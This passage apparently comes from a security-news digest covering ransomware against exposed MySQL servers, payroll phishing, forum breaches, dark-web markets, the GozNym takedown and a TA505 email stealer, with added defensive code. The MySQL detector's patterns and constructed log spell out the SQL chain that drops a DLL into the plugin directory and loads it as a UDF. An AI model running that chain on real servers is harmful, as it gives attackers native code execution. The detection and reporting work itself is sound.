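# only suspicious in combination; the last one loads native code on its own.
STAGES = [
    ("hex_blob_in_variable",
     re.compile(r"\bset\s+@\w+\s*=\s*(?:concat\s*\(\s*@\w+\s*,\s*)?0x[0-9a-f]{64,}", re.I)),
    ("write_to_plugin_dir",
     re.compile(r"\binto\s+dumpfile\s+'[^']*plugin[^']*'", re.I)),
    ("udf_create",
     re.compile(r"\bcreate\s+function\s+\w+\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)),
]


def detect_udf_chain(lines):
    """Group matches per connection (thread id) and return, for every
    connection that reached CREATE FUNCTION ... SONAME, the first line number
    of each stage seen plus the shared-library name it tried to load."""
    seen = {}
    for no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        tid, sql = m.group("tid"), m.group("arg")
        for stage, pat in STAGES:
            hit = pat.search(sql)
            if hit:
                entry = seen.setdefault(tid, {})
                entry.setdefault(stage, no)
                if stage == "udf_create":
                    entry["soname"] = hit.group(1)
    return {tid: st for tid, st in seen.items() if "udf_create" in st}


# Constructed excerpt: connection 17 walks the chain described in the article
# (table yongger2, function xpdl3, library cna12.dll); connection 18 is benign.
PLUGIN_DIR = "C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin"   # assumption
BLOB = "0x" + "4d5a9000" * 16                                       # fake DLL bytes
SAMPLE_LOG = [
    "2019-05-19T12:01:03.102301Z   17 Connect   root@203.0.113.9 on  using TCP/IP",
    f"2019-05-19T12:01:03.201000Z   17 Query     set @a = {BLOB}",
    f"2019-05-19T12:01:03.305000Z   17 Query     set @a = concat(@a, {BLOB})",
    "2019-05-19T12:01:03.400000Z   17 Query     insert into yongger2 values (@a)",
    f"2019-05-19T12:01:03.500000Z   17 Query     select data from yongger2 into dumpfile '{PLUGIN_DIR}/cna12.dll'",
    "2019-05-19T12:01:03.600000Z   17 Query     drop table yongger2",
    "2019-05-19T12:01:03.700000Z   17 Query     CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'",
    "2019-05-19T12:05:44.000000Z   18 Query     SELECT id, name FROM customers WHERE id = 42",
]

if __name__ == "__main__":
    for tid, stages in detect_udf_chain(SAMPLE_LOG).items():
        print(f"connection {tid}: UDF load of {stages['soname']} at line {stages['udf_create']}")
    # On the server itself, `SELECT name, dl FROM mysql.func` lists the UDFs
    # actually registered, and the plugin_dir variable shows where to look.
```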
According to Sophos, at least one Chinese threat actor is currently carrying out this kind of attack, scanning the internet for Windows servers that are running MySQL databases.
“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.
“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”
“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”
The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.
The GandCrab sample that targeted the honeypot was downloaded more than 500 times. Unfortunately, the sample was not the only one: counted together, experts estimated there had been nearly 800 downloads in five days, as well as more than 2300 downloads of the other GandCrab sample in the open directory.
“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.
“Counted together, there have been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.”
The researchers pointed out that this isn’t a massive or widespread attack, but it represents a serious risk to MySQL server admins who have exposed their installs online.
Getting your paycheck deposited directly into your bank account seems like a handy solution, but in some cases hackers can access it.
Getting your paycheck deposited directly into your bank account seems like a handy solution because you don’t have to pick up the check from your workplace and take it to the bank to deposit it. It works well in many cases but is not immune to hackers.
Hackers Do a Payroll Diversion Through
A direct deposit paycheck hack involves getting the necessary details from the victim through a phishing scheme. According to a statement from the FBI’s Internet Crime Complaint Center (IC3), cybercriminals orchestrate the phishing attempt — which the FBI calls a “payroll diversion” — to get the details for a person’s online payroll account.
Once successful, the hacker changes the account details for the direct deposit payments to an account they control. The FBI notes that the hacker’s account often connects to a prepaid credit card instead of a traditional bank account. Moreover, the cybercriminal applies a rule so that the rightful direct deposit recipient does not get a notification about the account change.
An Increasingly Attempted Hack
This method hackers use likely won’t come as a surprise when you consider a few recent statistics about phishing. When PhishLabs published findings from its most recent report, it revealed that phishing attacks in 2018 went up by 40.9%. Plus, in 83.9% of cases, hackers aimed to get user credentials for various services, including payment-related ones.
And, the PhishLabs report showed 98% of the phishing emails that made it past enterprise-level email security controls did not contain malware. A different phishing study from Barracuda explained why hackers don’t need malware to cause damage. Instead, they use social engineering to pose as a person or company that the victim knows and responds to without question.
Those efforts fall into the business email compromise (BEC) category. Barracuda’s study examined 3,000 such attacks. It found that 60% did not contain links. But they often had personalized information such as the victim’s name or a question related to the person’s work.
Even worse, hackers tweaked the email addresses to make them appear as being from legitimate people in the company. Typically, the hackers set up accounts with free email services and create accounts containing a real employee’s name. That’s enough genuine information for the recipients to act without looking at the rest of the email address too closely.
Trustwave covered BEC payroll hacks in a blog post and mentioned that cybercriminals often make the phishing emails seem to originate from a company’s CEO and go to a human resources or accounting manager, or someone else with the ability to alter an employee’s direct deposit account information. The hackers also perform research to determine which parties have the authority to make such changes before sending the emails.
Payroll Companies and Employers Can Commit
Most of the content here focuses on cybercriminals going through the
process of stealing direct deposit details. But that’s not the only kind of
payroll fraud that can happen. Unfortunately, some payroll companies that
enterprises work with have bad actors in them who find various ways to
keep workers from their money. Or the employers themselves give false
information about the number of employees on the payroll.
One incident committed by a payroll company in Australia resulted in
the equivalent of a $122.5 million
USD tax fraud. That incident is a strong reminder that whether
companies have employees only in the U.S. or working elsewhere in the world,
it’s crucial to do business with a trustworthy vendor who knows the global
business realm. Choosing a United States-headquartered company is also smart
due to the security and protection that U.S. jurisdiction offers.
How to Stay Safe From Payroll Diversion Fraud
Statistics from 2016 indicate 82% of Americans receive their
paychecks via direct deposit. So, it’s not surprising that hackers try this
paycheck diversion tactic. Knowing the information here, what can you do to
stay safe and increase the chances of having access to your money as expected?
Firstly, if you are in a position of authority and get a request from
someone asking for a direct deposit account change, don’t respond to the email
in an act of blind trust. If possible, contact that person through another
method, such as by phone or approaching them in person to verify that they
truly sent the message. Do the same if someone from payroll emails you asking
for your direct deposit details to “update their records.”
Another thing you can do is check the structure of the email. As
mentioned earlier, the emails used for this kind of BEC trick normally have at
least one component that’s not quite right. For example, it may have a person’s
name but come from a free email service instead of the company domain.
It’s also ideal at a company level if employees get educated about how
to recognize this kind of fraud and get information about the steps they should
go through if they receive suspicious emails of any kind. For example, they
could forward any strange emails about payroll details or otherwise to the IT
department for further review.
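The three checks above (verify out of band, inspect the structure of the sender address, route odd payroll mail to IT) can be given an automated first pass. The following is an added example, not code from the original article; the company domain, employee directory, free-mail list and the three sample messages are all constructed for the demonstration.

```python
"""Automated first pass over inbound mail for the payroll-diversion signs above.

Added example, not code from the original article. The company domain, employee
directory, free-mail list and the three sample messages are all constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

COMPANY_DOMAIN = "example-corp.test"                 # assumed internal domain
FREE_MAIL_DOMAINS = {"gmail.com", "yahoo.com", "outlook.com", "hotmail.com", "aol.com"}
# Constructed directory of people whose name an attacker could borrow.
EMPLOYEE_DIRECTORY = {
    "jane doe": "jane.doe@example-corp.test",
    "pat smith": "pat.smith@example-corp.test",
}
# Phrases that characterise the lure: account changes and "update your records".
PAYROLL_PATTERNS = [
    r"direct\s+deposit",
    r"bank(ing)?\s+(account|details|information)",
    r"update\s+(my|your|our|their)\s+(records|account)",
    r"payroll",
]


def _norm(name: str) -> str:
    return re.sub(r"\s+", " ", name).strip().lower()


def _plain_text(msg) -> str:
    """Subject plus every text/plain part, decoded leniently."""
    chunks = [msg.get("Subject", "")]
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def assess_email(raw: str) -> dict:
    """Return identity findings, lure patterns and a verdict for one raw message."""
    msg = message_from_string(raw)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    identity = []

    # A real employee's display name on an address that is not that employee's.
    known = EMPLOYEE_DIRECTORY.get(_norm(from_name))
    if known and from_addr.lower() != known:
        identity.append(f"display name '{from_name}' belongs to {known}, sender is {from_addr}")
    # Free webmail where the company domain would be expected.
    if from_domain in FREE_MAIL_DOMAINS:
        identity.append(f"sender domain {from_domain} is a free webmail service")
    # Replies quietly routed to a different domain.
    if reply_to and reply_to.rpartition("@")[2].lower() != from_domain:
        identity.append(f"Reply-To {reply_to} does not match From domain {from_domain}")

    # The lure itself: any payroll/bank-change language in subject or body.
    lure = [p for p in PAYROLL_PATTERNS if re.search(p, _plain_text(msg), re.IGNORECASE)]

    if lure and identity:
        verdict = "likely-bec"            # impersonation plus the lure
    elif lure:
        verdict = "verify-out-of-band"    # even internal payroll requests get a phone call
    else:
        verdict = "ok"
    return {"from": from_addr, "identity_findings": identity, "lure_patterns": lure,
            "verdict": verdict}


# Constructed sample messages (no real people, domains or account data).
SAMPLE_BEC = (
    "From: Jane Doe <jane.doe.ceo@gmail.com>\n"
    "To: hr@example-corp.test\n"
    "Subject: Quick change before payroll runs\n"
    "\n"
    "Hi, I switched banks this week. Please update my direct deposit\n"
    "to the new account I will send you, before Friday. Thanks, Jane\n"
)
SAMPLE_PAYROLL_REQUEST = (
    "From: Payroll <payroll@example-corp.test>\n"
    "To: pat.smith@example-corp.test\n"
    "Subject: Action required: update our records\n"
    "\n"
    "Please reply with your direct deposit details so we can update our records.\n"
)
SAMPLE_LEGIT = (
    "From: Pat Smith <pat.smith@example-corp.test>\n"
    "To: hr@example-corp.test\n"
    "Subject: Parking permit renewal\n"
    "\n"
    "Can you confirm the deadline for renewing parking permits? Thanks, Pat\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_BEC, SAMPLE_PAYROLL_REQUEST, SAMPLE_LEGIT):
        result = assess_email(raw)
        print(result["from"], "->", result["verdict"])
        for finding in result["identity_findings"]:
            print("   ", finding)
```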
Think Before You Act
Getting paid on time is a top concern for most people. But, even if you get an email that insists you need to provide the requested details to avoid payment delays, it’s best to investigate further before responding.
Since April 2019, Group-IB has successfully blocked more than 43,000 links to pirated copies of the Game of Thrones Season 8 on pirate websites, forums, and social media
As the Game
of Thrones saga came to a close (no spoilers here), Group-IB has summed up the
results of its anti-piracy campaign during Season 8 of Game of Thrones –
one of the biggest franchises in TV history. Since April 2019, when the
final season premiered, Group-IB’s Anti-Piracy team has successfully blocked more
than 43,000 links to pirated copies of GOT Season 8 on pirate websites,
forums, and social media. Group-IB’s Anti-Piracy team was brought in to protect
Game of Thrones against online pirates back in 2015. Since that time, the
company’s specialists have blocked more than 180,000 links to illegal copies of
Game of Thrones in Russian.
The final GOT Season 8 premiered on 14 April and became one of the show’s most
popular seasons not only among fans all over the world, but also among online
pirates. Group-IB’s Anti-Piracy team discovered and blocked 43,711 links to
pirated Season 8 episodes in Russian. Illegal copies surfaced on pirate
websites, forums, and social media. Pirated copies of the GOT Season 8 episodes
were spotted on 1,098 different websites, 94 of which were designed exclusively
for the distribution of pirated GOT copies.
More than 30,000 unique links to pirated GOT episodes have been removed from the
search results of the Russian search engine Yandex. In response to the
blocking, online pirates struck back by creating mirrors on a daily basis – copies
of their websites with new but very similar domain names. For instance, one of
the pirates created more than 20 mirrors on their subdomains. However, according
to the pirates’ forum posts, the owners of pirate websites were not ready for
the “attack” on them: “Looks like somebody just wiped the links out. Some of
the pages disappeared… some of them do not appear in search results”. It is
also interesting that some of the groups on VK.com, a Russian social network, removed
pirated episodes after receiving complaints and turned into GOT fan pages.
The streaming service Amediateka holds exclusive distribution rights for Game
of Thrones in Russia and, since April 2015, when Season 5 premiered, has used
the services of Group-IB to fight online pirates distributing illegal copies of
GOT in Russian. Season after season, online pirates’ interest in the show
has only been increasing. For example, while Season 5 was broadcast, Group-IB’s
Anti-Piracy team detected and removed 2,067 links to illegal copies. Season 7
saw an increase, reaching 12,540 links to pirated episodes detected and blocked.
Season 8 set a record of 43,711 links. Over the past 4 years, Group-IB detected
and blocked more than 180,000 links, including links detected and blocked
between the seasons’ airings.
Game of Thrones is not the only Amediateka show that Group-IB’s Anti-Piracy team protects, but
it turned out to be the pirates’ favorite one. Pirates’ other top targets include
True Detective, with 23,473 pirated links detected and blocked, Billions (20,303
links), The Good Wife (14,541 links), and Westworld, with 12,229 links detected and blocked by Group-IB.
the battle against online pirates, trying to profit off the illegal distribution
of the Game of Thrones in Russian, was as fierce as for George R.R. Martin’s
characters,” commented Andrey Busargin, Director
of Anti-Piracy and Brand Protection at Group-IB. “I would also like to
highlight Amediateka’s commitment to counter online piracy in Russia: they brought
in Group-IB Anti-Piracy team ahead of time and have been making continuous
efforts to popularize legal viewership of the Game of Thrones making it
available on its website, in movie theaters all over the country and even on
Group-IB’s fight against digital piracy started in 2011, when the Anti-Piracy Department was
established. Group-IB’s Anti-Piracy team uses unique machine-learning
technologies, applied in complex investigations of cyberattacks, to detect pirate
websites, find their owners and block illegal content. Group-IB’s Anti-Piracy
system monitors 100,000+ resources in all languages, ranging from torrent
trackers and streaming services to social media groups and pirate platforms on
the DarkNet. The average time to detect the first pirated copy on the Internet
is 30 minutes. 80% of pirated links are successfully blocked by Group-IB’s team within
24 hours of their appearance on the Internet.
This is really interesting: a popular online forum that hackers have been using to trade stolen credentials has been hacked!
Reports confirm that OGusers, a popular online forum used by hackers to trade stolen account credentials, has been hacked and that this has caused the sensitive personal data of many users to be exposed.
Brian Krebs writes, in his website KrebsOnSecurity, “Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.”
It all started with an administrator of OGusers explaining to forum members, on May 12, that an outage had caused a hard drive failure, leading to the erasure of several months’ worth of private messages, forum posts and prestige points. He also stated that he had restored a backup from January 2019. What the OGusers administrators apparently did not realize was that, coinciding with the outage, the forum’s user database had been stolen and the forum’s hard drives wiped. Four days later, on May 16, the administrator of the rival hacking community RaidForums uploaded the entire OGusers database for anyone to download for free.
The KrebsOnSecurity report quotes the message that RaidForums administrator Omnipotent has posted. It reads, “On the 12th of May 2019 the forum ogusers.com was breached [and] 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”
Brian Krebs further says, “The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).”
Experts point out that although the exposed passwords are hashed, the hashing algorithm used was salted MD5, an old and very fast hash that is unsuitable for password storage, which puts all the passwords at risk of exposure.
Since OGusers is already known as a forum that attracts people who hijack phone numbers to take over victims’ social media, financial accounts, email, etc., and sell such access for thousands of dollars, the exposure has caused shock among many in the community. Anxious members responded promptly and, as per Brian Krebs, some of them even complained of being targeted by phishing emails. It’s also reported that some members expressed anger at the main administrator of OGusers. The members even seemed to claim that the main administrator, who uses the nickname ‘Ace’, altered the functionality of the forum following the hack so as to prevent users from removing their accounts.
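To see why a leaked salted-MD5 store is still a liability and how a site can migrate away from it at login time, here is an added example (not the forum software’s code). The record layout md5(salt + password) is an assumed stand-in for the “default salted MD5” mentioned above, the PBKDF2 work factor is assumed, and the users and passwords are constructed.

```python
"""Why a leaked salted-MD5 password store is still at risk, and how to migrate it.

Added example, not the forum software's code. The layout md5(salt + password) is an
assumed stand-in for "default salted MD5"; users, passwords and salts are constructed.
"""
import hashlib
import hmac
import os
import time

PBKDF2_ITERATIONS = 200_000   # assumed work factor for the replacement scheme


def md5_record(password: str, salt: bytes = b"") -> dict:
    """Legacy record: one fast MD5 over salt||password (assumed legacy layout)."""
    salt = salt or os.urandom(8)
    return {"scheme": "md5", "salt": salt,
            "digest": hashlib.md5(salt + password.encode()).hexdigest()}


def pbkdf2_record(password: str, salt: bytes = b"") -> dict:
    """Replacement record: PBKDF2-HMAC-SHA256 with a deliberately high iteration count."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return {"scheme": "pbkdf2", "salt": salt, "digest": digest.hex()}


def verify(record: dict, password: str) -> bool:
    """Recompute under the record's own scheme and compare in constant time."""
    if record["scheme"] == "md5":
        candidate = md5_record(password, record["salt"])["digest"]
    else:
        candidate = pbkdf2_record(password, record["salt"])["digest"]
    return hmac.compare_digest(candidate, record["digest"])


def cost_per_guess(scheme: str, trials: int) -> float:
    """Seconds that one offline guess costs whoever holds a leaked record of this scheme."""
    record = md5_record("x") if scheme == "md5" else pbkdf2_record("x")
    start = time.perf_counter()
    for i in range(trials):
        verify(record, f"guess{i}")          # every wrong guess costs one full hash
    return (time.perf_counter() - start) / trials


def rehash_on_login(store: dict, user: str, password: str) -> bool:
    """Transparent migration: a successful legacy login rewrites the record as PBKDF2."""
    record = store.get(user)
    if record is None or not verify(record, password):
        return False
    if record["scheme"] == "md5":
        store[user] = pbkdf2_record(password)
    return True


if __name__ == "__main__":
    store = {"alice": md5_record("correct horse")}        # constructed legacy store
    print("legacy login ok:", rehash_on_login(store, "alice", "correct horse"))
    print("alice now stored as:", store["alice"]["scheme"])
    md5_cost = cost_per_guess("md5", 20_000)
    kdf_cost = cost_per_guess("pbkdf2", 3)
    print(f"one guess: md5 {md5_cost * 1e6:.1f} us, pbkdf2 {kdf_cost * 1e3:.0f} ms, "
          f"ratio ~{kdf_cost / md5_cost:,.0f}x")
```

The ratio printed at the end is the whole point of the leak: an attacker holding salted-MD5 digests can test guesses tens of thousands of times faster than against a deliberately slow KDF.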
On the other hand, reports say that an OGusers administrator commented, after the hack was disclosed, that though members’ frustration is understandable, it’s to be noted that even Twitter, Facebook and other Forums that people have used have been breached more than once.
Brian Krebs concludes his report with a very relevant remark. He says, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”
In December 2017, Jordan Evan Bloom (27), a Canadian man, was charged in connection with a data leak of 3 billion hacked accounts; the man was running a website that collected and sold personal data and login credentials from the victims.
The man was charged as part of an investigation dubbed “Project Adoration,” into trafficking in personal data, unauthorized use of computers, and possession of illicitly obtained property.
The RCMP alleges that Bloom was the administrator of the LeakedSource.com website, which operated through his company Defiant Tech.
LeakedSource offered for sale access to data gathered from the victims of security breaches, sometimes buying it from hackers.
For $2 a day, a LeakedSource subscriber could obtain details on individuals by entering an email address or username. LeakedSource also cracked the associated passwords whenever possible. The website was very popular among the users of HackForums.net.
“A guilty plea was entered in court today by Defiant Tech Inc., to the charges of Trafficking In Identity Information and Possession of Property Obtained By Crime a year and a half after charges were laid into the RCMP’s cybercrime investigation dubbed Project “Adoration”. ” reads the press release published by RCMP.
“LeakedSource.com had a database of approximately three billion personal identity records and associated passwords that could be purchased for a small fee. Defiant Tech Inc. was operating the LeakedSource.com website and the company earned approximately $247,000 from trafficking identity information. “
The arrest of Bloom is the result of a joint effort of Canadian authorities, FBI and Dutch National Police.
According to the Royal Canadian Mounted Police, Defiant Tech made around CAN$247,000 (US$183,000) from its illegal activities.
“We are pleased with this latest development,” said Superintendent Mike Maclean, Officer in Charge Criminal Operations of the RCMP National Division. “I am immensely proud of this outcome as combatting cybercrime is an operational priority for us.”
According to the experts, Bloom didn’t operate the website alone; at least one other person, a US citizen, was involved, but no one else was charged.
What is the difference between the Deep Web and the Dark Web? Considerations about the past, present, and future of the Dark Web.
These are intense days for the Dark Web. Operations conducted by law enforcement agencies have led to the arrest of many individuals and the closure of the most popular black marketplaces, some of which had survived for years.
Operators behind the principal black markets made a lot of money; think of the managers of Wall Street Market and Valhalla, recently seized by the feds. These were historic points of aggregation where it was possible to buy drugs, weapons, and any kind of hacking tool.
The icing on the cake was a US study concluding that the size of the Dark Web is significantly smaller than previously thought. This is not news to the experts who study the dark web and its evolution.
Unfortunately there is too much confusion between the terms deep web and dark web, and many YouTube channels provide wrong information. Misinterpretation, superficiality, and sometimes simple profit are the root causes of the confusion. This misinformation is extremely dangerous for kids, the first consumers of the videos published on the main social media platforms. Some videos show how simple it supposedly is to buy drugs “securely” or explain how to hack a website. Describing these phenomena, some journalists have been labeled “experts on the dark web”.
The Dark Web is just a portion of the Deep Web; access to it is quite simple and doesn’t require any specific technical skill. It is very easy to access the Tor network or browse content on other anonymizing networks like I2P.
I started this research in September 2016, when I began writing my book, “The Prison of the Humanity – from the deep web to 4.0 the new digital prisons”.
An iceberg has always been used as a visual representation of the Internet. The visible peak, which is the smallest part of the iceberg and which many have mistakenly associated with the clear web, is the part reachable by search engines.
Even a child could easily wonder: how can billions of sites visible to internet users represent only 5% of the internet?
The Deep Web is composed of the content of the www that is not indexed by search engines. Think of the site of a provider that offers voice or connectivity services to millions of people, families and companies: its files are not indexable by search engines. Think of a banking site with millions of account holders whose transaction histories, deposits and investments are kept for years and years without, obviously, being accessible to the entire web population.
Let’s also include all the information produced by IoT devices that are connected online but cannot be accessed for obvious reasons.
Well, now you have an idea of the dimension of the deep web.
THE DARK WEB
What is the Dark Web? It is a non-indexed subset of the Deep Web. Accessible through Tor and other software, its size is incalculable if we rely on imagination. In fact, there could be many .onion sites (the domain extension used inside the Tor network) that are not listed by the Hidden Wiki, a sort of Wikipedia of onion links. Furthermore, each website can have sublevels that could reach infinity.
But here we are talking about legends. Let’s get into the merits of my research, which is based on the facts and experience of three years of journalistic navigation in the Dark Web, where I have not only browsed dozens of directories but have visited at least 100,000 sites.
My research is based on 100,000 sites that I have personally visited and that can be easily classified into very few categories, which I will explain with brief descriptions:
Freedom of Expression – Counter-information
The spirit of the Dark Web includes precisely the freedom of expression, with portals that give “uncomfortable” or “alternative” news in countries where there is censorship. There are many sites in multiple languages that refer to ideological and collective movements, mostly of anarchist derivation, but there are also movements that promote the defense of online privacy. So there is a great deal of counter-information, and the most obvious example that I always cite is the Bible translated into the languages of the countries where it is strictly prohibited.
Black Markets
They are the heart of the Dark Web in economic terms. Needless to say, it is impossible to count them or verify their reliability, but they are certainly the points of aggregation for several million users and unscrupulous sellers that offer drugs, weapons, prescription-only medicines, bank credentials and personal data of unsuspecting users, steroids and hacking guides.
Not Working
Empty pages and the typical 404 errors that pad the lists of .onion domains in the directories.
Scams
There are many sites that promise the same services as the black markets, including hitman services, hacking services, money laundering services… but they are only services operated by scammers.
Directories – Search Engines
There are many directories that offer the same links, and Hidden Wiki services that offer a guide to the principal links in the Dark Web, but it is clear that the Hidden Wiki is one: the original not only lists the links to the sites but also provides an “obscure and forbidden” encyclopedia service similar to the better-known Wikipedia. Search engines similar to Google are also frequent, but they do not always find the result users hope for.
Pornography – Violence on Animals – Gore
There are many pornographic sites on the clear web, but pornography on the dark web takes on gruesome tones. Violence, child abuse, snuff movies and extreme sex are very common. The sites that belong to these categories are divided into different types: chat rooms, traditional websites or service containers. The chats are usually open and there is a remarkable exchange of multimedia files for free. Then there are the forums that need registration; they offer audio/video content or images, and also provide suggestions on how to kill people or how to eat them in ritual cannibalism. Furthermore, there are many child pornography sites on the dark web that point to the largest online sharing platforms, such as Satoshi box or Megaupload, where it is possible to pay to download packages of illegal content.
Websites – Forums
They are normal websites that deal with different topics, including forums that are meeting points for users discussing legal and illegal issues. There are many blogs, most of which deal with cybersecurity and the rights of the digital population in terms of consumer protection and privacy.
Consider that sites belonging to the above categories are, in many cases, traps set up by law enforcement agencies to identify criminals. The dark web is full of honeypots.
Let’s conclude with some statistics on the composition of the Dark Web:
Not Working: 45%
Websites – Forums: 6%
Child pornography – Gore: 4%
Directories – search engines: 0.5%
Black Markets: 0.2%
At this time, it is not possible to determine the exact number of black markets; anyway, it is really limited. Terrorism is an irrelevant phenomenon in terms of propaganda. It is also impossible to determine the diffusion of honeypots.
The real question is not how big the Dark Web is, but what will happen after the operations conducted by law enforcement?
Who will be its users? Will black markets still exist?
Or is the Dark Web itself a honeypot for criminals, anarchists, terrorists and pedophiles?
These doubts are legitimate, given the military origins of the most popular anonymizing network.
A joint effort by international law enforcement agencies from 6 different countries has dismantled the crime gang behind the GozNym banking malware.
GozNym banking malware is considered one of the most dangerous threats to the banking industry; experts estimate that, over the years, it was used to steal nearly $100 million from over 41,000 victims across the globe.
“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by the Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”
The GozNym banking malware was first spotted in April 2015 by researchers from IBM X-Force Research; it combines the best features of the Gozi ISFB and Nymaim malware.
GozNym has been seen targeting banking institutions, credit unions, and retail banks. Among the victims of the GozNym Trojan are 24 financial institutions in North America and organizations in Europe, including a Polish webmail service provider, investment banking and consumer accounts at 17 banks in Poland, and one bank in Portugal.
Now Europol has announced the unprecedented international law enforcement operation that dismantled this complex, globally operating and organised cybercrime network.
Europol, with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States, identified ten individuals alleged to be members of the GozNym network.
Five defendants were arrested during several coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine; the remaining ones are Russian citizens and are still on the run, including the expert who developed the banking malware.
The cybercrime organization has been described by the Europol as a highly specialised and international criminal network.
One of the members, who encrypted the GozNym malware to avoid detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.
Operators behind the GozNym malware used the Avalanche network to spread the malware.
“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network. The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. “Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network. The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.”
The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.
“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:
infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.”
The defendants are well known in the Russian underground; they advertised their specialized technical skills and services in Russian-speaking online criminal forums, through which the leader of the GozNym network recruited them.
“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues Europol.
Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group
During the last month, our Threat Intelligence surveillance team spotted increasing evidence of an intensification of operations against the banking sector. In fact, many independent researchers pointed to a particular email attack wave probably related to the known TA505 hacking group, active since 2014 and focused on retail and banking companies. The group is also known for the evasive techniques it has adopted over time to avoid security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legitimate programs regularly used by the victim, or abusing validly signed payloads.
Investigating and tracking their operations during April and May, we detected an interesting tool delivered to the victim machine. Just after the opening of the malicious documents and the installation of the FlawedAmmyy RAT implant, the group deployed a particular credential-stealing software, part of their arsenal, revealing details of their recent operation.
The piece of malware under analysis was downloaded from “bullettruth[.com/out[.exe” and executed on the victim machines after the infection was established.
First, we noticed this secondary component was well protected against antivirus detection: the PE file was signed in the first half of May by Sectigo, one of the major Russian Certification Authorities. Analyzing the trust chain, we found the attackers were relying on cryptographic keys issued to a UK company named SLON LTD. At this time, we have no evidence to determine whether or not it was the victim of a previous hack.
Anyway, a static inspection of the binary revealed that the malware has a quite high entropy level, suggesting it may be packed.
Dynamically executing the malware reveals more information about its behaviour. The malicious executable is essentially an email stealer: its only purpose is to retrieve all the email accounts and passwords present on the victim machine. After executing the information-gathering routine, the malware sends all the retrieved emails and passwords to its C2:
The interesting thing about the communication with the C2 is that there is no encryption: the harvested data is sent to the C2 in JSON format. Investigating the attacker’s infrastructure through our Digital Surveillance systems, we also found interesting information, such as details of the stolen emails.
To retrieve more details about this email stealer, the analysis moved on to debugging and disassembling. As previously mentioned, the malware sample is heavily obfuscated and packed. However, by letting the malware execute within a debugger, we were able to extract its unpacked payload.
As shown in the figure above, the two components have a peculiarity: while the packed sample is compiled with Microsoft Visual C++ version 6.0, the unpacked one is compiled with Microsoft Visual C++ version 8. At this point, we deepened the analysis of the extracted payload. However, we were not able to execute it, because it references many memory addresses of the original binary. So we carried on with static analysis of the extracted sample.
As previously described, the malware’s principal purpose is to iterate through the filesystem looking for email accounts. The first step is to check whether the “outlook.exe” process is running and, if so, to kill it. The malware iterates through the running processes with the Process32FirstW API and then kills Outlook with TerminateProcess:
The extracted payload does not present any type of code obfuscation or other protection. In fact, the C2 server and the path are not encoded:
The last routine analyzed is the credential harvesting across the entire filesystem.
Apart from the routine that searches for the email accounts registered in the Outlook and Thunderbird clients (as shown in Figure 7), there is another one that scans the filesystem looking for hardcoded extensions; if one of them is found, a reference to the file is kept inside the %TEMP% directory. At this point, all the gathered email accounts are sent to the server, and the malware then erases all traces of itself from the infected machine: it creates a simple batch script that deletes the executable and all the tracks of the infection.
